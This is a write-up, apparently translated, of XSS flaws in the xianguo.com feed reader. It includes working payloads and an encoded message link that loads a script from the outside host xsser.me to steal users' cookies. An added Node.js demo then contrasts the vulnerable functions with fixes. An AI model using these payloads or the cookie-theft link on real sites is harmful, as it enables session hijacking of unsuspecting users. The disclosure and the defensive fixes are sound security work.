1) Stored XSS, the kind that really hurts.
1.1) Stored XSS in the publishing function. The title is filtered properly, but the body text is not filtered at all, so XSS code can be inserted into the body text of every publishing function. For example, we inserted the following into the body text: test
1.2) Stored XSS in the tag settings. Here Xianguo does defend: the "<" character cannot be typed in. Well, if it cannot be typed, it can be pasted; we copied in prepared XSS code directly. After a few attempts we found that the <script> tag is filtered only once, so a payload that reassembles into a <script> tag after that single pass survives, and the XSS code sits quietly in the tag waiting to be triggered.
2) Reflected XSS
2.1) XSS in the search function. Go to the search function and first enter ">" as a test; it slips through unfiltered. Well, this one is much easier. Directly construct the following code for testing:
"><script>alert(document.cookie)</script><input
2.2) DOM-based plus reflected XSS in the feedback function. Click "feedback" and notice a feature of the page: the tags content in the URL corresponds exactly to the TAG content on the page. So open the browser's debugger and insert the XSS code directly after the tags content in the URL:
<script>alert(/2/)</script>
After the URL request is submitted, an alert window pops up.
2.3) Constructing reflected XSS in the reader function. The reader page shows the following URL:
http://xianguo.com/reader#PageMgr.goIndexPage()
A function is referenced directly in the URL. Can we use that? Construct the following link and submit it directly:
http://xianguo.com/reader#PageMgr.goIndexPage(alert(/xss/))
and an alert window pops up.
3) Using reflected XSS to steal user cookies
3.1) Do not underestimate reflected XSS; under the right conditions it can be exploited too.
3.2) Xianguo has an on-site message function. Can this function be combined with reflected XSS to do some work? Send the following reflected XSS link to user B:
http://xianguo.com/search?searchType=all&keyword=%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32%34%3E%3C%2F%73%63%72%69%70%74%3E
(The keyword parameter URL-decodes to "><script/src=http://xsser.me/W6XZPx?1353073324></script>, so opening the link loads a script from an external host into the search page; encoding the letters as well as the special characters keeps the link from looking like script at a glance.)
3.3) Log in as user B and view the message: the Xianguo developers did not process the sensitive characters in the link at all, but passed it on to user B as is.
3.4) If an unsuspecting user opens the link we sent, then...
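The four weaknesses above, reduced to plain functions so they can be run and compared with their fixes. This is an added example, not code from the original writeup or from xianguo.com: the PageMgr object, the nested-tag payload and the eval-based fragment routing are assumptions (the page only shows that appending alert(/xss/) to the fragment fires), while the search payload, the fragment payload and the on-site message link are taken from the text. It runs under Node with no DOM; a recorded alert() stands in for the browser's pop-up.

```javascript
// Added example, not code from the original writeup or from xianguo.com.
// Demonstrates: a tag filter that strips "<script>" once (1.2), a search
// keyword reflected unescaped into an attribute (2.1), a function name taken
// from the URL fragment (2.3), and what the URL-encoded message link from
// 3.2 actually carries. PageMgr, the nested-tag payload and the eval-based
// routing are assumptions; the other payloads and the link are from the text.

const escapeHtml = (s) => String(s)
  .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
  .replace(/"/g, '&quot;').replace(/'/g, '&#39;');

// --- 1.2: a filter that removes "<script>" only once -------------------
// Without the /g flag only the first match is removed, so a tag nested
// inside another reassembles into a complete <script> after the pass.
function filterTagOnce(tag) {
  return tag.replace(/<\/?script>/i, '');
}
// Encoding instead of removing leaves nothing for a second pass to rebuild.
function filterTagSafe(tag) {
  return escapeHtml(tag);
}

// --- 2.1: search keyword reflected into an input attribute -------------
function renderSearchVulnerable(keyword) {
  return `<input name="keyword" value="${keyword}">`;
}
function renderSearchSafe(keyword) {
  return `<input name="keyword" value="${escapeHtml(keyword)}">`;
}

// --- 2.3: function reference in the URL fragment -----------------------
const popups = [];                       // stand-in for the browser's alert()
function alert(msg) { popups.push(String(msg)); }

const PageMgr = {                        // assumed shape of the reader router
  goIndexPage() { return 'index'; },
  goReadPage()  { return 'read'; },
};
// Assumed vulnerable behaviour: everything after '#' is evaluated as JS,
// which is what makes alert(/xss/) fire when appended to the URL.
function routeHashVulnerable(hash) {
  return eval(hash.slice(1));
}
// Fixed: accept only "#PageMgr.<name>()" with <name> an own property of
// PageMgr; arguments, other objects and prototype names are rejected.
function routeHashSafe(hash) {
  const m = /^#PageMgr\.([A-Za-z]+)\(\)$/.exec(hash);
  if (!m || !Object.prototype.hasOwnProperty.call(PageMgr, m[1])) return null;
  return PageMgr[m[1]]();
}

// --- 3.2: what the URL-encoded link actually carries -------------------
function decodeKeyword(link) {
  return new URL(link).searchParams.get('keyword');
}
// Full chain: link from the message -> search page built with the raw
// keyword -> a <script src> tag pointing at the external host.
function searchPageFromLink(link) {
  return renderSearchVulnerable(decodeKeyword(link));
}

// Constructed inputs (NESTED_TAG is assumed; the other three are quoted from the text).
const NESTED_TAG = '<scr<script>ipt>alert(1)</script>';
const SEARCH_PAYLOAD = '"><script>alert(document.cookie)</script><input';
const READER_HASH = '#PageMgr.goIndexPage(alert(/xss/))';
const MESSAGE_LINK = 'http://xianguo.com/search?searchType=all&keyword='
  + '%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73'
  + '%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32'
  + '%34%3E%3C%2F%73%63%72%69%70%74%3E';

function demo() {
  return {
    onceFiltered: filterTagOnce(NESTED_TAG),
    safeFiltered: filterTagSafe(NESTED_TAG),
    vulnSearch:   renderSearchVulnerable(SEARCH_PAYLOAD),
    safeSearch:   renderSearchSafe(SEARCH_PAYLOAD),
    vulnRoute:    routeHashVulnerable(READER_HASH),
    safeRoute:    routeHashSafe(READER_HASH),
    linkKeyword:  decodeKeyword(MESSAGE_LINK),
    linkPage:     searchPageFromLink(MESSAGE_LINK),
  };
}
console.log(demo());
```

Run it with node; the "once" filter hands back a clean <script> tag, the vulnerable search template emits the payload's script verbatim, the eval router records the /xss/ pop-up, and the decoded keyword is the external <script src> tag. The two fixes follow the same rule in each case: encode at the point of output rather than trying to strip, and when the URL names code to run, look the name up in an allow-list instead of evaluating the string.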